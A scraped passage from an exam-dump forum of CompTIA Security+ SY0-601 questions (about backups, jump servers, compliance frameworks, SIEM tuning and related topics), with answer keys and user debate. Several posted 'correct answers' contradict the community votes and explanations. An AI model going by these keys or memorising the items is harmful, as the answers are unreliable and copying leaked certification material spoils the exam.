whatever vulnerabilities where on the system 72 hours ago, its best to start a fresh and then check for vulnerabilities on the system incase you
risk re-running the attack again...
upvoted 2 times

  Knowledge33 3 months ago


Selected Answer: A
A and C are correct, but A is better. WHat is the reason to lose all 7 days data? The last incremental backup is enough to avoid the ransomware.
C is very drastic. Why not to erase all servers? Lol
upvoted 1 times

  lordguck 3 months ago


More infomation is needed for this question. The nature of the webserver decides, what to do best. Is the data (e.g. SQL DB) on another server
and the server is responsible for the webinterface: B, is the server part of a standardized webserver cluster (e.g google/facebook): D. C: if the 72h
version is compromised already and there no inc/diff backup before that.
As there is not enough information to go by, I toss my hat for A
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 334/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  [Removed] 3 months, 1 week ago


Definitely C... and that's also pretty sketch bc those 7 day old backups will also probably be encrypted. Given the question presented this is the
best answer.
upvoted 1 times

  jspecht 3 months, 1 week ago


Selected Answer: C
Restoring from a full backup that is 7 days old is going to be faster than restoring from a full backup + the incrementals to restore to 3 days ago.

Plus, this is a web server, which shouldn't change that much in 7 days (unless new code is deployed) making C the best answer.
upvoted 1 times

  03allen 3 months, 2 weeks ago


Selected Answer: C
go with C, an incremental backup should rely on a full backup?
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 335/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #191 Topic 1

A network engineer created two subnets that will be used for production and development servers. Per security policy production and
development servers must each have a dedicated network that cannot communicate with one another directly. Which of the following should be
deployed so that server administrators can access these devices?

A. VLANs

B. Internet proxy servers

C. NIDS

D. Jump servers

Correct Answer: A

Community vote distribution


D (86%) 14%

  stoneface Highly Voted  5 months ago


Selected Answer: D
A jump server, jump host or jump box is a system on a network used to access and manage devices in a separate security zone. A jump server is
a hardened and monitored device that spans two dissimilar security zones and provides a controlled means of access between them
upvoted 20 times

  i_bird 4 months, 2 weeks ago


Jump server...how??
your explanation does not correlate with the question asked.

Ans = A
Disagree
upvoted 3 times

  Knowledge33 3 months ago


The response is D. Why do you need VLAN while the separated networks are already created by the network engineer? Please read the
question again.
upvoted 3 times

  i_bird 4 months, 2 weeks ago


on second thought..jump server seems reasonable since its a medium to access devices in both envs
upvoted 4 times

  zzzfox 4 months, 3 weeks ago


Disagree, Yes jump server is used to access a secure network zone. For example, external clients need to access the jump server then they
can access the web/application server. But it doesn't mean that the jump server will separate the access to production and dev servers.
hence I would go VLANs.
upvoted 9 times

  asum Most Recent  2 weeks, 2 days ago


Selected Answer: A
VLAN (virtual local area network) A
logically separate network, created by
using switching technology. Even though
hosts on two VLANs may be physically
connected to the same cabling, local
traffic is isolated to each VLAN so they
must use a router to communicate.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: D
To allow server administrators to access production and development servers on separate networks, while also complying with the security
policy that prohibits direct communication between these networks, the network engineer should deploy jump servers. Jump servers, also known
as bastion hosts or access servers, are secure servers that are placed on both networks and can be accessed remotely by authorized users.
These servers provide a secure and controlled way for users to access the production and development servers on their respective networks,
without allowing direct communication between the networks. This makes jump servers an ideal solution for this situation. VLANs, internet proxy
servers, and NIDS (network intrusion detection systems) are not relevant in this scenario, as they do not address the requirement for controlled
access to separate networks
upvoted 1 times

  GetBuckets 1 month, 4 weeks ago

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 336/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Being CCNA certified twice, that’s VLAN to me, so it’s A.


upvoted 4 times

  rodwave 2 months, 3 weeks ago


Selected Answer: D
Answer: Jump Servers

The question is not asking for a method to separate the networks, it's asking for a method for accessing devices from networks that shouldn't
communicate with each other.

Jump servers or jump boxes are systems used to access and manage devices in a separate security zone, so they make the most sense as an
option to deploy as they're trying to access devices on a separate network.

Regarding the VLANs, while the question mentions that the network engineer has already created two subnets, it doesn't mean that VLANs are
implemented (subnet != VLAN). Subnets are just blocks of IP addresses while VLANs are devices logically group together. Assigning VLANs can
span accross multiple subnets.
upvoted 2 times

  DanteSurman 2 months, 3 weeks ago


Answer is A. VLAN.
From Clarke G COMPTIA:
" You can use VLANs on a switch to break the network down into multiple virtual LANs. Systems in one VLAN are, by default, unable to
communicate with systems in another VLAN"
upvoted 1 times

  DanteSurman 2 months, 3 weeks ago


Sorry. Answer is D. Jump Server
upvoted 1 times

  J_Ark1 2 months, 4 weeks ago


Selected Answer: D
The question has the word "policy" hence meaning that the VLANS where already configured/ implemented, now its just asking what the best
way to access these VLANS...
upvoted 1 times

  J_Ark1 2 months, 4 weeks ago


THe wording is very tricky but its like reading paragraphs in one sentence other times its just common sense lolz
upvoted 1 times

  Gino_Slim 3 months, 1 week ago


Selected Answer: D
It's D. Because the question DESCRIBES a VLAN...you don't deploy a VLAN to access a VLAN. It's asking what medium needs to be created.
The medium is the "jump server"...I'm almost certain something like this will be on the test simply because it's confusing
upvoted 3 times

  ostralo 3 months, 3 weeks ago


Once you know what systems require this extra layer of protection, you can define the shape of the trust boundary. The most common tools for
this are network security devices like firewalls or virtual LANs (VLANs). Either way, these devices are also part of the assets that fall in scope for
management through the jump box.

https://www.f5.com/labs/articles/cisotociso/protecting-critical-systems-with-isolation-and-jump-boxes

Please check the image in the link.


upvoted 1 times

  ostralo 3 months, 3 weeks ago


Which of the following should be deployed so that server administrators can access these devices?

We can use VLAN to separate the two networks but it doesn't provide access to the admin.
For admin to be able to access, we need to create jump servers.
upvoted 1 times

  omodara 4 months, 1 week ago


D is the answer. A jump box is a hardened machine for segregation administrators access. There is already two subnets for prod and dev
meaning each already on different subnet. The question asked about the server administrators on how they can access these devices, so D is
correct
upvoted 2 times

  Bodatiousbob 4 months, 1 week ago


Selected Answer: D
Even though VLAN would work as well, the ending that says "deployed" makes me think physical and Jump Server would fit the bill. VLANs are
"configured/implemented" more so than "deployed". CompTIA is purposely terrible with wording...
upvoted 1 times

  serginljr 4 months, 1 week ago


Selected Answer: D

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 337/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

It's D.

Taken from the Textbook:

An important security concept common in managing


screened subnets is a jump server or jump box. A jump
server is a system used to access systems in different
security zones, such as a screened subnet. It is an
especially hardened system just for this purpose that
provides a method to access resources in the screened
subnet from the protected network via other trusted
systems.
upvoted 2 times
  CertAddict69 4 months, 2 weeks ago
Selected Answer: A
I think this is A for the reason zzzfox has explained, I'm going to do more research on jump servers though.
upvoted 1 times

  Lars87 4 months, 3 weeks ago


Selected Answer: A
no doubt
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 338/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #192 Topic 1

A social media company based in North America is looking to expand into new global markets and needs to maintain compliance with
international standards.
With which of the following is the company's data protection officer MOST likely concerned?

A. NIST Framework

B. ISO 27001

C. GDPR

D. PCI-DSS

Correct Answer: A

Community vote distribution


B (89%) 11%

  jgp Highly Voted  4 months, 4 weeks ago


Selected Answer: B
They don't specify Europe and ISO 27001 is the international standard
upvoted 18 times

  Joe1984 Highly Voted  5 months ago


This should be GDPR.
upvoted 12 times

  BigLao 3 months ago


No, GDPR is limited to Europe, question says, global market
upvoted 2 times

  Gino_Slim 3 months, 1 week ago


It should not be Joe.
upvoted 3 times

  ronniehaang Most Recent  4 days, 2 hours ago


Selected Answer: C
The social media company's data protection officer is MOST likely concerned with the General Data Protection Regulation (GDPR). GDPR is a
regulation that protects the privacy and personal data of individuals within the European Union (EU). As the company is expanding into new
global markets, it must maintain compliance with international standards and ensure that the personal data of individuals in the EU is protected
according to the GDPR guidelines.
upvoted 1 times

  amberlj102 2 months, 1 week ago


Here is an explanation on how GDPR can apply outside of EU https://gdpr.eu/companies-outside-of-europe/

The best answer here is ISO 27001 but if that was not an option it would be GDPR
upvoted 1 times

  babyzilla 2 months, 2 weeks ago


Selected Answer: B
Come on, people. Just google ISO 27001 and you will see it is the only clear answer. GDPR was the answer for another question on here and it
was specifically for Europe. Please don't confuse others by being incorrect and confident lol
upvoted 3 times

  atrax 3 months, 2 weeks ago


Selected Answer: C
GDPR for me
upvoted 1 times

  Skelter117 3 months, 2 weeks ago


Selected Answer: C
They do not specifically include Europe but if they are looking to expand globally then Europe may be an area that they need to learn the
regulations of or be compliant with, which would be GDPR. does that make sense?
upvoted 2 times

  deeden 4 months, 1 week ago


Selected Answer: B

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 339/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

ISO 27001 is an international standard and companies servicing global will want to be certified to stay competitive. Although, GDPR is a law and
not a standard, it is still a concern when serving EU customers. In addition, ISO 27001 talks about complying with laws and regulations for those
in scope of a company's ISMS, which may very well include GDPR, among others.
upvoted 2 times
  Heroofatea 4 months, 1 week ago
Selected Answer: C
GDPR for working with EU customers data
upvoted 1 times

  Sandon 1 month, 3 weeks ago


The question never mentioned the EU, so no.
upvoted 1 times

  Heroofatea 4 months, 1 week ago


Also ISO 27001 is not mandatory in EU + data protection officer was hired in our company because of GDPR
upvoted 1 times

  passmemo 4 months, 2 weeks ago


Selected Answer: B
ISO/IEC 27001 is an international standard on how to manage information security
upvoted 4 times

  hazeleyes 4 months, 3 weeks ago


Selected Answer: B
GDPR is neither international (it's european) nor a standard (it's a law). The answer is ISO 27001.
upvoted 5 times

  anonimouse2 4 months, 4 weeks ago


As someone who worked in GRC, this is definitely referring to ISO 27001. The clue is in the name.
upvoted 7 times

  varun0 4 months, 4 weeks ago


Selected Answer: C
Data protection officer will be concerned about privacy so gdpr
upvoted 1 times

  Swarupam 5 months ago


Selected Answer: B
GDPR is mainly related to protection of personal data whereas the "international standard for compliance" is something more related to ISO
27001
upvoted 6 times

  k9_462 5 months ago


Selected Answer: B
"NIST is considered best for organizations that are in the early stages of developing a risk management plan. ISO 27001, comparatively, is better
for operationally mature organizations."

since the social media company is already established, it may be safe to assume they are "operationally mature"
upvoted 5 times

  k9_462 5 months ago


Selected Answer: B
since they didnt specify the EU, i would rule out the GPDR and choose B - ISO 27001 - is an international standard on how to manage
information security.
upvoted 4 times

  Joe1984 5 months ago


Thinking this is GDPR.
upvoted 7 times

  RodIT 2 weeks, 1 day ago


A is the correct answer
NIST is the organization that sets framework and controls for optimal security configuration in US
ISO is international, GDPR is for EU
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 340/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #193 Topic 1

A security architect is required to deploy to conference rooms some workstations that will allow sensitive data to be displayed on large screens.
Due to the nature of the data, it cannot be stored in the conference rooms. The file share is located in a local data center. Which of the following
should the security architect recommend to BEST meet the requirement?

A. Fog computing and KVMs

B. VDI and thin clients

C. Private cloud and DLP

D. Full drive encryption and thick clients

Correct Answer: B

Community vote distribution


B (100%)

  stoneface Highly Voted  5 months ago


Selected Answer: B
VDI and thin clients.
upvoted 9 times

  rodwave Highly Voted  2 months, 3 weeks ago


Selected Answer: B
Answer: VDI and thin clients

Virtual Desktop Infrastructure (VDI) is a technology that refers to the use of virtual machines to provide and manage virtual desktops. VDI hosts
desktop environments on a centralized server and deploys them to end-users on request. VDI can be used to provide the desktop experience.

The computing hardware for VDI can be split into thin clients and thick clients:

- Thin clients are simple computers that can be accessed through a remote connection to a central server which provides the client all of its
resources. Thin clients do not have hard drives so data isn't stored locally, and applications would also need to be accessed through a server.
Thin clients would work for this scenario since data can't be stored in the conference rooms and thin clients cant store data anyway.

- Thick clients are fully functional networked computers that have their OS, local storage, and handles their own processing. Just think company-
provided desktop computers or laptops. They can connect to a server if they want, but can work independently as well. Since files can be stored
locally on a thick client, they wouldn't work with the requirements of the scenario.
upvoted 8 times

  andrizo Most Recent  3 months, 3 weeks ago


Nac should've been an answer
upvoted 1 times

  kennyleung0514 3 months, 3 weeks ago


Selected Answer: B
as for display, it should not be necessary to store data.
using thin client + VDI would be the best, and easy to restore to default settings
upvoted 1 times

  RonWonkers 4 months, 1 week ago


Selected Answer: B
Agree with B
upvoted 1 times

  Jakalan7 4 months, 2 weeks ago


Dear lord, I wonder who writes some of these questions. This one is worded so poorly it nearly gave me an aneurysm.

I'll go with the majority - B.


upvoted 1 times

  Sandon 1 week, 3 days ago


This one wasn't that tough honestly
upvoted 1 times

  hazeleyes 4 months, 3 weeks ago


Selected Answer: B
Thin client so it doesn't store data, VDI so it has access to the material on display.

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 341/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 3 times

Question #194 Topic 1

A Chief Information Security Officer wants to ensure the organization is validating and checking the integrity of zone transfers. Which of the
following solutions should be implemented?

A. DNSSEC

B. LDAPS

C. NGFW

D. DLP

Correct Answer: A

Community vote distribution


A (100%)

  okay123 Highly Voted  5 months ago


A zone file is a text based file with a format defined in RFC 1035 and 1034 and is stored on a DNS server (name server). Zone files contain the IP
and name data, MX records and other service records. They also contain glue data that connects them to the other DNS servers.The default
behavior for DNS zone transfer permits any host to request and
receive a full zone transfer for a Domain. This is a security issue since DNS data
can be used to decipher the topology of a company’s network. The information
obtained can be used for malicious exploitation such as DNS poisoning/spoofing.
This is like an anonymous person calling the receptionist to request and receive
the entire company’s telephone and address book.

https://www.giac.org/paper/gsec/2668/securing-dns-zone-transfer/104562
upvoted 12 times

  rodwave Most Recent  2 months, 3 weeks ago


Selected Answer: A
Domain Name System Security Extensions (DNSSEC) is a set of specifications that extend the DNS protocol by adding cryptographic
authentication
upvoted 1 times

  comeragh 4 months ago


Selected Answer: A
Zone transfers - DNS related. Agree with A being the correct answer here.
upvoted 2 times

  gen2dee 4 months, 2 weeks ago


Selected Answer: A
correct
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 342/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #195 Topic 1

Which of the following controls is used to make an organization initially aware of a data compromise?

A. Protective

B. Preventative

C. Corrective

D. Detective

Correct Answer: D

Community vote distribution


D (100%)

  rodwave 2 months, 3 weeks ago


Selected Answer: D
Answer: Detective

Detective control identifies security events that have already occurred. Intrusion detection systems are detective controls.
=======================
Preventative Controls - acts to eliminate or reduce the likelihood that an attack can succeed. A preventative control operates before an attack
can take place. They are comparing the configurations to a secure guideline to ensure no gaps. Meaning they are pre-emptively hardening their
systems against future attack vectors.

Corrective Controls - controls that remediate security issues that have already occurred. Restoring backups after a ransomware attack is an
example of a corrective control.
upvoted 1 times

  Knowledge33 3 months ago


Selected Answer: D
Detective controls act during an event, alerting operators to specific conditions.
upvoted 1 times

  db97 4 months, 1 week ago


initially aware of a data compromise -> that sounds more like a preventive control
upvoted 2 times

  db97 4 months, 1 week ago


Disregard that I was thinking since an awareness training perspective, but if it is a real data compromise being communicated then is
Detective.
upvoted 2 times

  RonWonkers 4 months, 1 week ago


Selected Answer: D
Agree with D
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 343/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #196 Topic 1

An annual information security assessment has revealed that several OS-level configurations are not in compliance due to outdated hardening
standards the company is using. Which of the following would be BEST to use to update and reconfigure the OS-level security configurations?

A. CIS benchmarks

B. GDPR guidance

C. Regional regulations

D. ISO 27001 standards

Correct Answer: A

Community vote distribution


A (100%)

  stoneface Highly Voted  5 months ago


Selected Answer: A
CIS Benchmarking -> CIS Benchmarks from the Center of Internet Security (CIS) are a set of globally recognized and consensus-driven best
practices to help security practitioners implement and manage their cybersecurity defenses.
upvoted 13 times

  okay123 Most Recent  1 month, 3 weeks ago


Selected Answer: A
CIS Benchmarks for mobile devices cover security configurations for operating systems that run on mobile phones, tablets, and other hand-held
devices.

ISO/IEC 27001 is an Information security management standard that structures how businesses should manage risk associated with information
security threats;

The General Data Protection Regulation sets guidelines for the collection and processing of personal data of individuals within the European
Union; its about how organizations should handle the personal data of individuals
upvoted 2 times

  RonWonkers 4 months, 1 week ago


Selected Answer: A
It is A
upvoted 3 times

  pgonza 2 months, 2 weeks ago


Why A?
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 344/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #197 Topic 1

A company acquired several other small companies. The company that acquired the others is transitioning network services to the cloud. The
company wants to make sure that performance and security remain intact. Which of the following BEST meets both requirements?

A. High availability

B. Application security

C. Segmentation

D. Integration and auditing

Correct Answer: D

Community vote distribution


D (65%) A (30%) 4%

  varun0 Highly Voted  5 months ago


Selected Answer: D
Integrate the components in cloud and then audit them to ensure performance and security are working to expectations
upvoted 10 times

  ronniehaang Most Recent  4 days, 1 hour ago


Selected Answer: A
A. High availability is the BEST option that meets both the performance and security requirements of the company. High availability involves
creating a highly available network infrastructure that can automatically detect and recover from outages or failures. This can be achieved
through the use of redundant components and the implementation of load balancing, failover mechanisms, and disaster recovery plans. High
availability ensures that the network remains available to users and that data is protected, even in the event of an outage or failure, thus meeting
both performance and security requirements.
upvoted 1 times

  ronniehaang 4 days, 1 hour ago


A. High availability is a design pattern that ensures that cloud-based network services are continuously operational and accessible, even in
the event of system failures or network outages. By using high availability techniques, the company can ensure that its cloud-based network
services remain secure and performant, even during unexpected disruptions. This helps to ensure that performance and security remain intact
and the company can continue to provide reliable services to its customers.
upvoted 1 times

  jaspernutta 1 month ago


A.
High availability refers to the ability of a system or service to remain operational and available to users with minimal downtime. By ensuring high
availability, the company can maintain good performance and ensure that users have access to the network services they need. High availability
can also improve security, as it helps to prevent disruptions that could potentially be caused by security incidents or other issues.
upvoted 2 times

  Sandon 1 week, 3 days ago


Negative ghostrider
upvoted 1 times

  nicekoda 1 month, 1 week ago


Segmentation eliminates the flaws of flat networks. Segmenting a network also leads to better performance due to less congestion.
upvoted 1 times

  Sandon 1 week, 3 days ago


That ain't it buddy
upvoted 1 times

  Ranaer 1 month, 1 week ago


Selected Answer: A
It's A, everyone selecting a different answer, isnt thinking this trough. I see many comments how security isnt part of HA. This is false. If your
service can be brought down by a DDOS, it wouldnt have HA, which is why security is a core component of HA.
Application security doesnt affect performance.
Segmentation doent affect performance.
Integration and auditing is an important part in bringing the new companies services and applications into the main company, but still this is a
one time thing, while HA is something that matter constantly throughout time.
upvoted 1 times

  Sandon 1 week, 3 days ago


You couldn't be more wrong, good luck
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 345/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  ebeewhy 1 month, 2 weeks ago


Selected Answer: C
I have to go with segmentation. "HA is certainly a part of a risk management plan, but it can also only mitigate certain risks. HA does nothing to
mitigate the risks of data inconsistency, a lack of security or shoddy compliance." It says nothing about wanting to integrate the companies, so
the only way to maintain security and performance is to separate them. Auditing only allows you to find security vulnerabilities but does not
maintain security like keeping them separate would.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: A
The company should implement high availability to meet both performance and security requirements. High availability refers to the ability of a
system or service to remain available and functioning even in the event of hardware or software failures. By implementing high availability, the
company can ensure that network services remain available and performant even if there are disruptions or failures in the cloud environment. This
will also help to maintain the security of the network services, as they will continue to be available and functioning even if there are issues with
the underlying infrastructure. Segmentation, application security, and integration and auditing are all important for maintaining security and
performance, but high availability is the solution that specifically addresses both requirements
upvoted 2 times

  Sandon 1 month, 3 weeks ago


That ain't it. High availability does not ensure security.
upvoted 1 times

  Ranaer 1 month, 1 week ago


I beg to differ. If your system is succeptible to a DDOS, this would bring it down, thus making it not available. Security is core component
of High availability.
upvoted 1 times

  Tomtom11 3 months, 1 week ago


Selected Answer: D
The integration of the appropriate level and quantity of security controls is a
subject that is always being audited. Are the controls appropriate? Are they
placed and used correctly? Most importantly, are they effective? These are
standard IT audit elements in the enterprise. The moving of computing
resources to the cloud does not change the need or intent of audit functions.
upvoted 3 times

  passmemo 4 months, 2 weeks ago


Selected Answer: D
For sure
upvoted 1 times

  Nichgs 4 months, 3 weeks ago


Should it be Segmentation? It provides security and performance
upvoted 3 times

  Dachosenone 4 months, 4 weeks ago


Selected Answer: D
High availability does not guarantee for security to remain intact. While auditing may detect vulnerabilities and threats, displaying weak links, poor
configurations, and high-risk practices. So I'm going with D
upvoted 1 times

  okay123 5 months ago


Selected Answer: A
High availability means that an IT system, component, or application can operate at a high level, continuously, without intervention, for a given
time period. High-availability infrastructure is configured to deliver quality performance and handle different loads and failures with minimal or
zero downtime.

I think it's A..


upvoted 3 times

  andrizo 3 months, 3 weeks ago


But no security
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 346/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #198 Topic 1

After a recent external audit, the compliance team provided a list of several non-compliant, in-scope hosts that were not encrypting cardholder
data at rest. Which of the following compliance frameworks would address the compliance team's GREATEST concern?

A. PCI DSS

B. GDPR

C. ISO 27001

D. NIST CSF

Correct Answer: A

Community vote distribution


A (100%)

  banditring Highly Voted  5 months ago


keyword in this question is cardholder
upvoted 13 times

  passmemo Highly Voted  4 months, 2 weeks ago


Selected Answer: A
Payment Card Industry
upvoted 6 times

  RonWonkers Most Recent  4 months, 1 week ago


Selected Answer: A
cardholder = PCI DSS
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 347/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #199 Topic 1

A security analyst is receiving several alerts per user and is trying to determine if various logins are malicious. The security analyst would like to
create a baseline of normal operations and reduce noise. Which of the following actions should the security analyst perform?

A. Adjust the data flow from authentication sources to the SIEM.

B. Disable email alerting and review the SIEM directly.

C. Adjust the sensitivity levels of the SIEM correlation engine.

D. Utilize behavioral analysis to enable the SIEM's learning mode.

Correct Answer: B

Community vote distribution


D (93%) 7%

  stoneface Highly Voted  5 months ago


Selected Answer: D
D is the answer
upvoted 9 times

  Swarupam 5 months ago


Could you please explain the reason as well? I am confused between C & D
upvoted 1 times

  enginne 4 months, 2 weeks ago


No info about duplicates acording to ansewer C " SIEM correlation engine" . D is correct
upvoted 2 times

  FMMIR Most Recent  1 month, 3 weeks ago


Selected Answer: C
This is confusing again. But I believe the answer C.

The security analyst should adjust the sensitivity levels of the SIEM correlation engine to reduce the number of alerts and create a baseline of
normal operations. A SIEM, or security information and event management, system aggregates and analyzes log data from various sources in
real-time. The correlation engine is the component of the SIEM that processes the log data and identifies potential security incidents. By
adjusting the sensitivity levels of the correlation engine, the security analyst can control the number and types of alerts that are generated. This
can help reduce the number of false positives and create a baseline of normal operations, allowing the security analyst to focus on investigating
only the most relevant alerts. Disabling email alerting and reviewing the SIEM directly, adjusting the data flow from authentication sources, and
utilizing behavioral analysis are not directly related to reducing the number of alerts or creating a baseline of normal operations.
upvoted 1 times

  Sandon 1 month, 3 weeks ago


Wrong, again.
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: D
Answer: Utilize behavioral analysis to enable the SIEM's learning mode.

UBA or User Behavior Analytics and is a threat detection analysis technology that uses AI to understand how users normally behave and then
find anomalous activities, which deviate from their normal behavior and may be indicative of a threat.

For this scenario, the SIEM will first learn what is normal behavior then when a baseline is created, it will know if any of the logins are malicious.
Likely determined by when and where the logins are occurring and if it's different from the baseline. This should hopefully reduce the amount of
alerts occurring.
upvoted 4 times

  kennyleung0514 3 months, 3 weeks ago


Selected Answer: D
the model answer is with no sense.
it should be D, to set a baseline, using the behavior is the best way to go
upvoted 1 times

  usam2021 4 months, 3 weeks ago


This might help answer why is D: https://www.ibm.com/topics/siem (AI learning and behavior analysis)
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 348/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #200 Topic 1

Which of the following is the MOST effective way to detect security flaws present on third-party libraries embedded on software before it is
released into production?

A. Employ different techniques for server- and client-side validations

B. Use a different version control system for third-party libraries

C. Implement a vulnerability scan to assess dependencies earlier on SDLC

D. Increase the number of penetration tests before software release

Correct Answer: D

Community vote distribution


C (91%) 9%

  stoneface Highly Voted  5 months ago


Selected Answer: C
Going with C
upvoted 13 times

  J_Ark1 2 months, 3 weeks ago


what is sdlc? again
upvoted 2 times

  Sandon 2 months, 1 week ago


Software development life cycle
upvoted 1 times

  babyzilla 2 months, 2 weeks ago


Systems Development Cycle
upvoted 1 times

  babyzilla 2 months, 2 weeks ago


Systems Development Life* Cycle
upvoted 2 times

  ronniehaang Most Recent  4 days, 1 hour ago


Selected Answer: C
C. Implement a vulnerability scan to assess dependencies earlier on SDLC

It is a best practice to assess security flaws in software dependencies as early as possible in the software development life cycle (SDLC) to
minimize the risk of vulnerabilities being exploited in production. One effective way to do this is by implementing a vulnerability scan to assess
dependencies, which are third-party libraries embedded in the software. A vulnerability scan can detect security flaws and vulnerabilities in the
libraries used by the software and provide recommendations for remediation. By implementing a vulnerability scan early in the SDLC, the
company can proactively address security issues before they become a problem in production.
upvoted 2 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: C
The most effective way to detect security flaws present on third-party libraries embedded on software before it is released into production is to
implement a vulnerability scan to assess dependencies earlier on the SDLC, or software development life cycle. A vulnerability scan is a type of
security assessment that involves identifying and analyzing potential vulnerabilities in a system or application. By conducting a vulnerability scan
earlier on in the SDLC, the development team can identify any security flaws in the third-party libraries before the software is released into
production. This can help prevent security issues from being introduced into the production environment and ensure that the software is secure
and compliant. Employing different techniques for server- and client-side validations, using a different version control system for third-party
libraries, and increasing the number of penetration tests are not directly related to detecting security flaws in third-party libraries.
upvoted 2 times

  rodwave 2 months, 3 weeks ago


Selected Answer: C
Answer: Implement a vulnerability scan to assess dependencies earlier on SDLC

Implementing vulnerability scans allows for earlier detection and assessment of any potential vulnerabilities, which can then be addressed
accordingly.
upvoted 1 times

  zharis 3 months, 1 week ago

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 349/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Selected Answer: D
Going with D. Penetration tests which actively test security controls exploit vulnerabilities - prove that a vulnerability is high risk by exploiting it to
gain access to data or install backdoors
upvoted 2 times

  RonWonkers 4 months, 1 week ago


Selected Answer: C
Gonna go with C
upvoted 1 times

  okay123 5 months ago


Selected Answer: C
It's C
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 350/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #201 Topic 1

Which of the following prevents an employee from seeing a colleague who is visiting an inappropriate website?

A. Job rotation policy

B. NDA

C. AUP

D. Separation of duties policy

Correct Answer: C

Community vote distribution


C (56%) D (31%) 13%

  banditring Highly Voted  3 months, 3 weeks ago


This is what happens when CompTIA runs out of questions to make up and then they start sounding stupid -_-
upvoted 14 times

  mark9999 3 months, 1 week ago


Very true. They are so hell bent on changing loads of questions so that the dumps don't work that they make up a lot of ambiguous drivel.
There are only so many ways to ask the same concepts.
upvoted 1 times

  Gino_Slim 3 months, 1 week ago


This is the true answer
upvoted 1 times

  ronniehaang Most Recent  4 days, 1 hour ago


Selected Answer: D
D. Separation of duties policy is the control that prevents an employee from seeing a colleague who is visiting an inappropriate website.
Separation of duties policy is a management principle in which tasks and responsibilities are divided among multiple individuals to reduce the risk
of fraud or misuse of resources. By implementing this policy, different employees will have different responsibilities, making it difficult for a single
person to access or view sensitive information or engage in malicious activities.
upvoted 1 times

  ZDW 1 week, 4 days ago


Selected Answer: C
It would be AUP because having Job rotation, seperation of duties, or signing an NDA would not prevent any possible colleague from seeing you
on an inappropriate website. however, an AUP can require things such as a screen cover that has to potential to prevent others from seeing what
you are doing.
upvoted 1 times

  diegomatheus00 2 weeks, 1 day ago


What a terrible question
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: D
A separation of duties policy would prevent an employee from seeing a colleague who is visiting an inappropriate website. Separation of duties is
a security control that ensures that no single individual has complete control over a particular process or activity. This can help prevent fraud and
abuse by requiring multiple individuals to be involved in different stages of a process. In the context of preventing an employee from seeing a
colleague visiting an inappropriate website, a separation of duties policy could involve implementing different roles or responsibilities for different
individuals. For example, one individual might be responsible for monitoring network traffic, while another individual might be responsible for
responding to incidents. This would prevent any single individual from being able to view the inappropriate website and potentially escalate the
situation. Job rotation, NDA, and AUP are not directly relevant to preventing an employee from seeing a colleague visiting an inappropriate
website.
upvoted 1 times

  Sandon 1 month, 3 weeks ago


Meh, probably not
upvoted 1 times

  Jimbobilly 1 month, 4 weeks ago


Good grief, what kind of a question is that?
upvoted 1 times

  zaac22 2 months, 2 weeks ago


C, my explanation: the user could use his device to trace/monitor colleagues' activities. The AUP should prevent such improper use of the device

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 351/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 1 times
  carpathia 2 months, 3 weeks ago
Selected Answer: A
Proabably Job Rotation, cause you can't see what the other is doing as youa re meant to be separated. Well, it doesn't mean exactly that sep of
dut imples you are 1km away from eachothe, but I don't know. The other ones do not apply to the situation, at least from what I see in Comptia
books. God save us!
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: C
Answer: AUP

I don't understand the question so I'll assume the question is....

